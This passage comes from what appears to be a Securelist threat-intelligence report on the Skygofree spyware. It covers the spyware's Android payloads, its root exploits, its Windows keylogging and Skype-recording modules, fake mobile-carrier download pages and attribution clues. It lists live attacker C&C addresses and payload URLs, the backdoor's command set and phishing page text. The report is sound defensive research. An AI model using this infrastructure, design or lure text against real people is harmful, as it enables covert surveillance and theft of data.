Due to this feature, it is clear that the developers paid special attention to the work of the implant on Huawei devices.\n\nAlso, we found a debug version of the implant (70a937b2504b3ad6c623581424c7e53d) that contains interesting constants, including the version of the spyware.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-5.png>)\n\n_Debug BuildConfig with the version_\n\nAfter a deep analysis of all discovered versions of Skygofree, we made an approximate timeline of the implant's evolution.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-6.png>)\n\n_Mobile implant evolution timeline_\n\nHowever, some facts indicate that the APK samples from stage two can also be used separately as the first step of the infection. Below is a list of the payloads used by the Skygofree implant in the second and third stages.\n\n#### Reverse shell payload\n\nThe reverse shell module is an external ELF file compiled by the attackers to run on Android. The choice of a particular payload is determined by the implant's version, and it can be downloaded from the command and control (C&C) server soon after the implant starts, or after a specific command. In the most recent case, the choice of the payload zip file depends on the device process architecture. 
For now, we observe only one payload version for following the ARM CPUs: arm64-v8a, armeabi, armeabi-v7a.\n\nNote that in almost all cases, this payload file, contained in zip archives, is named 'setting' or 'setting.o'.\n\nThe main purpose of this module is providing reverse shell features on the device by connecting with the C&C server's socket.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-7.png>)\n\n_Reverse shell payload_\n\nThe payload is started by the main module with a specified host and port as a parameter that is hardcoded to '54.67.109.199' and '30010' in some versions:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-8.png>)\n\nAlternatively, they could be hardcoded directly into the payload code:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-8-5.gif>)\n\nWe also observed variants that were equipped with similar reverse shell payloads directly in the main APK /lib/ path.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-9.png>)\n\n_Equipped reverse shell payload with specific string_\n\nAfter an in-depth look, we found that some versions of the reverse shell payload code share similarities with PRISM - a stealth reverse shell backdoor that is available on [Github](<https://github.com/andreafabrizi/prism/>).\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-10.png>)\n\n_Reverse shell payload from update_dev.zip_\n\n#### Exploit payload\n\nAt the same time, we found an important payload binary that is trying to exploit several known vulnerabilities and escalate privileges. According to several timestamps, this payload is used by implant versions created since 2016. It can also be downloaded by a specific command. 
The exploit payload contains following file components:\n\n**Component name** | **Description** \n---|--- \nrun_root_shell/arrs_put_user.o/arrs_put_user/poc | Exploit ELF \ndb | Sqlite3 tool ELF \ndevice.db | Sqlite3 database with supported devices and their constants needed for privilege escalation \n \n'device.db' is a database used by the exploit. It contains two tables - 'supported_devices' and 'device_address'. The first table contains 205 devices with some Linux properties; the second contains the specific memory addresses associated with them that are needed for successful exploitation. You can find a full list of targeted models in the Appendix.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-11.png>)\n\n_Fragment of the database with targeted devices and specific memory addresses_\n\nIf the infected device is not listed in this database, the exploit tries to discover these addresses programmatically.\n\nAfter downloading and unpacking, the main module executes the exploit binary file. 
Once executed, the module attempts to get root privileges on the device by exploiting the following vulnerabilities:\n\nCVE-2013-2094 \nCVE-2013-2595 \nCVE-2013-6282 \nCVE-2014-3153 (futex aka [TowelRoot](<https://threatpost.com/android-root-access-vulnerability-affecting-most-devices/106683/>)) \nCVE-2015-3636\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-12.png>)\n\n_Exploitation process_\n\nAfter an in-depth look, we found that the exploit payload code shares several similarities with the public project [android-rooting-tools](<https://github.com/android-rooting-tools>).\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-13.png>)\n\n_Decompiled exploit function code fragment_\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-14.png>)\n\n_run_with_mmap function from the android-rooting-tools project_\n\nAs can be seen from the comparison, there are similar strings and also a unique comment in Italian, so it looks like the attackers created this exploit payload based on android-rooting-tools project source code.\n\n#### Busybox payload\n\nBusybox is public software that provides several Linux tools in a single ELF file. In earlier versions, it operated with shell commands like this:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-15.png>)\n\n_Stealing WhatsApp encryption key with Busybox_\n\n#### Social payload\n\nActually, this is not a standalone payload file \u2013 in all the observed versions its code was compiled with exploit payload in one file ('poc_perm', 'arrs_put_user', 'arrs_put_user.o'). This is due to the fact that the implant needs to escalate privileges before performing social payload actions. This payload is also used by the earlier versions of the implant. It has similar functionality to the 'AndroidMDMSupport' command from the current versions \u2013 stealing data belonging to other installed applications. The payload will execute shell code to steal data from various applications. 
The example below steals Facebook data:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-16.png>)\n\nAll the other hardcoded applications targeted by the payload:\n\n**Package name** | **Name** \n---|--- \njp.naver.line.android | LINE: Free Calls & Messages \ncom.facebook.orca | Facebook messenger \ncom.facebook.katana | Facebook \ncom.whatsapp | WhatsApp \ncom.viber.voip | Viber \n \n#### Parser payload\n\nUpon receiving a specific command, the implant can download a special payload to grab sensitive information from external applications. The case where we observed this involved WhatsApp.\n\nIn the examined version, it was downloaded from:\n\n_hxxp://url[.]plus/Updates/tt/parser.apk_\n\nThe payload can be a .dex or .apk file which is a Java-compiled Android executable. After downloading, it will be loaded by the main module via DexClassLoader api:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-17.png>)\n\nAs mentioned, we observed a payload that exclusively targets the WhatsApp messenger and it does so in an original way. 
The payload uses the Android Accessibility Service to get information directly from the displayed elements on the screen, so it waits for the targeted application to be launched and then parses all nodes to find text messages:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-18.png>)\n\nNote that the implant needs special permission to use the Accessibility Service API, but there is a command that performs a request with a phishing text displayed to the user to obtain such permission.\n\n### Windows\n\nWe have found multiple components that form an entire spyware system for the Windows platform.\n\n**Name** | **MD5** | **Purpose** \n---|---|--- \nmsconf.exe | 55fb01048b6287eadcbd9a0f86d21adf | Main module, reverse shell \nnetwork.exe | f673bb1d519138ced7659484c0b66c5b | Sending exfiltrated data \nsystem.exe | d3baa45ed342fbc5a56d974d36d5f73f | Surrounding sound recording by mic \nupdate.exe | 395f9f87df728134b5e3c1ca4d48e9fa | Keylogging \nwow.exe | 16311b16fd48c1c87c6476a455093e7a | Screenshot capturing \nskype_sync2.exe | 6bcc3559d7405f25ea403317353d905f | Skype call recording to MP3 \n \nAll modules, except skype_sync2.exe, are written in Python and packed to binary files via the Py2exe tool. This sort of conversion allows Python code to be run in a Windows environment without pre-installed Python binaries.\n\nmsconf.exe is the main module that provides control of the implant and reverse shell feature. It opens a socket on the victim's machine and connects with a server-side component of the implant located at 54.67.109.199:6500. 
Before connecting with the socket, it creates a malware environment in 'APPDATA/myupd' and creates a sqlite3 database there \u2013 'myupd_tmp\\\\\\mng.db':\n\nCREATE TABLE MANAGE(ID INT PRIMARY KEY NOT NULL,Send INT NOT NULL, Keylogg INT NOT NULL,Screenshot INT NOT NULL,Audio INT NOT NULL); \nINSERT INTO MANAGE (ID,Send,Keylogg,Screenshot,Audio) VALUES (1, 1, 1, 1, 0 )\n\nFinally, the malware modifies the 'Software\\Microsoft\\Windows\\CurrentVersion\\Run' registry key to enable autostart of the main module.\n\nThe code contains multiple comments in Italian, here is the most noteworthy example:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-19.png>)\n\n_\"Receive commands from the remote server, here you can set the key commands to command the virus\"_\n\nHere are the available commands:\n\n| **Name** | **Description** \n---|--- \ncd | Change current directory to specified \nquit | Close the socket \nnggexe | Execute received command via Python's subprocess.Popen() without outputs \nngguploads | Upload specified file to the specified URL \nnggdownloads | Download content from the specified URLs and save to specified file \nnggfilesystem | Dump file structure of the C: path, save it to the file in json format and zip it \nnggstart_screen \nnggstop_screen | Enable/disable screenshot module. When enabled, it makes a screenshot every 25 seconds \nnggstart_key \nnggstop_key | Enable/disable keylogging module \nnggstart_rec \nnggstop_rec | Enable/disable surrounding sounds recording module \nngg_status | Send components status to the C&C socket \n*any other* | Execute received command via Python's subprocess.Popen(), output result will be sent to the C&C socket. 
\n \nAll modules set hidden attributes to their files:\n\n**Module** | **Paths** | **Exfiltrated data format** \n---|---|--- \nmsconf.exe | %APPDATA%/myupd/gen/ | %Y%m%d-%H%M%S_filesystem.zip (file structure dump) \nsystem.exe | %APPDATA%/myupd/aud/ | %d%m%Y%H%M%S.wav (surrounding sounds) \nupdate.exe | %APPDATA%/myupd_tmp/txt/ \n%APPDATA%/myupd/txt/ | %Y%m%d-%H%M%S.txt (keylogging) \nwow.exe | %APPDATA%/myupd/scr/ | %Y%m%d-%H%M%S.jpg (screenshots) \nskype_sync2.exe | %APPDATA%/myupd_tmp/skype/ \n%APPDATA%/myupd/skype/ | yyyyMMddHHmmss_in.mp3 \nyyyyMMddHHmmss_out.mp3 \n(skype calls records) \n \nMoreover, we found one module written in .Net - skype_sync2.exe. The main purpose of this module is to exfiltrate Skype call recordings. Just like the previous modules, it contains multiple strings in Italian.\n\nAfter launch, it downloads a codec for MP3 encoding directly from the C&C server:\n\n_http://54.67.109.199/skype_resource/libmp3lame.dll_\n\nThe skype_sync2.exe module has a compilation timestamp - Feb 06 2017 and the following PDB string:\n\n_\\\\\\vmware-host\\Shared \nFolders\\dati\\Backup\\Projects\\REcodin_2\\REcodin_2\\obj\\x86\\Release\\REcodin_2.pdb_\n\nnetwork.exe is a module for submitting all exfiltrated data to the server. 
In the observed version of the implant it doesn't have an interface to work with the skype_sync2.exe module.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-20.png>)\n\n_network.exe submitting to the server code snippet_\n\n#### Code similarities\n\nWe found some code similarities between the implant for Windows and other public accessible projects.\n\n * https://github.com/El3ct71k/Keylogger/\n\nIt appears the developers have copied the functional part of the keylogger module from this project.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-21.png>)\n\n_update.exe module and Keylogger by 'El3ct71k' code comparison_\n\n * [Xenotix Python Keylogger](<https://github.com/ajinabraham/Xenotix-Python-Keylogger/>) including specified mutex 'mutex_var_xboz'.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-22.png>)\n\n_update.exe module and Xenotix Python Keylogger code comparison_\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-23.png>)\n\n_'addStartup' method from msconf.exe module_\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-24.png>)\n\n_'addStartup' method from Xenotix Python Keylogger_\n\n## Distribution\n\nWe found several landing pages that spread the Android implants.\n\n**Malicious URL** | **Referrer** | **Dates** \n---|---|--- \nhttp://217.194.13.133/tre/internet/Configuratore_3.apk | http://217.194.13.133/tre/internet/ | 2015-02-04 to \npresent time \nhttp://217.194.13.133/appPro_AC.apk | - | 2015-07-01 \nhttp://217.194.13.133/190/configurazione/vodafone/smartphone/VODAFONE%20Configuratore%20v5_4_2.apk | http://217.194.13.133/190/configurazione/vodafone/smartphone/index.html | 2015-01-20 to \npresent time \nhttp://217.194.13.133/190/configurazione/vodafone/smartphone/Vodafone%20Configuratore.apk | http://217.194.13.133/190/configurazione/vodafone/smartphone/index.html | currently active \nhttp://vodafoneinfinity.sytes.net/tim/internet/Configuratore_TIM.apk | 
http://vodafoneinfinity.sytes.net/tim/internet/ | 2015-03-04 \nhttp://vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/VODAFONE%20Configuratore%20v5_4_2.apk | http://vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/ | 2015-01-14 \nhttp://windupdate.serveftp.com/wind/LTE/WIND%20Configuratore%20v5_4_2.apk | http://windupdate.serveftp.com/wind/LTE/ | 2015-03-31 \nhttp://119.network/lte/Internet-TIM-4G-LTE.apk | http://119.network/lte/download.html | 2015-02-04 \n2015-07-20 \nhttp://119.network/lte/Configuratore_TIM.apk | 2015-07-08 \n \nMany of these domains are outdated, but almost all (except one - appPro_AC.apk) samples located on the 217.194.13.133 server are still accessible. All the observed landing pages mimic the mobile operators' web pages through their domain name and web page content as well.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-25.png>)\n\n_Landing web pages that mimic the Vodafone and Three mobile operator sites_\n\nNETWORK CONFIGURATION \n** AGG. 2.3.2015 *** \nDear Customer, in order to avoid malfunctions to your internet connection, we encourage you to upgrade your configuration. Download the update now and keep on navigating at maximum speed! \nDOWNLOAD NOW \nDo you doubt how to configure your smartphone? \nFollow the simple steps below and enter the Vodafone Fast Network. \nInstallation Guide \nDownload \nClick on the DOWNLOAD button you will find on this page and download the application on your smartphone. \nSet your Smartphone \nGo to Settings-> Security for your device and put a check mark on Unknown Sources (some models are called Sources Unknown). \nInstall \nGo to notifications on your device (or directly in the Downloads folder) and click Vodafone Configuration Update to install. \nTry high speed \nRestart your device and wait for confirmation sms. 
Your smartphone is now configured.\n\nFurther research of the attacker's infrastructure revealed more related mimicking domains.\n\nUnfortunately, for now we can't say in what environment these landing pages were used in the wild, but according to all the information at our dsiposal, we can assume that they are perfect for exploitation using malicious redirects or man-in-the-middle attacks. For example, this could be when the victim's device connects to a Wi-Fi access point that is infected or controlled by the attackers.\n\n## Artifacts\n\nDuring the research, we found plenty of traces of the developers and those doing the maintaining.\n\n * As already stated in the 'malware features' part, there are multiple giveaways in the code. Here are just some of them:\n**ngglobal _- _**_FirebaseCloudMessaging topic name_ \n--- \n**Issuer: CN = negg** - _from several certificates_ \n**negg.ddns[.]net, negg1.ddns[.]net, negg2.ddns[.]net - **_C&C servers_ \n**NG SuperShell - **_string from the reverse shell payload_ \n**ngg - **_prefix in commands names of the implant for Windows_ \n \n[](<https://securelist.com/files/2018/01/180115-skygofree-26.png>)\n\n_Signature with specific issuer_\n\n * Whois records and IP relationships provide many interesting insights as well. There are a lot of other 'Negg' mentions in Whois records and references to it. For example:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-27.png>)\n\n## Conclusions\n\nThe Skygofree Android implant is one of the most powerful spyware tools that we have ever seen for this platform. 
As a result of the long-term development process, there are multiple, exceptional capabilities: usage of multiple exploits for gaining root privileges, a complex payload structure, never-before-seen surveillance features such as recording surrounding audio in specified locations.\n\nGiven the many artifacts we discovered in the malware code, as well as infrastructure analysis, we are pretty confident that the developer of the Skygofree implants is an Italian IT company that works on surveillance solutions, just like HackingTeam.\n\n##### Notes\n\n*Skygofree has no connection to Sky, Sky Go or any other subsidiary of Sky, and does not affect the Sky Go service or app.\n\n[ **Skygofree Appendix \u2014 Indicators of Compromise (PDF)**](<https://securelist.com/files/2018/01/Skygofree_appendix_eng.pdf>)", "modified": "2018-01-16T10:00:58", "published": "2018-01-16T10:00:58", "href": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", "id": "SECURELIST:52B19EC96333D6EAA616F8D528A8E64A", "type": "securelist", "title": "Skygofree: Following in the footsteps of HackingTeam", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}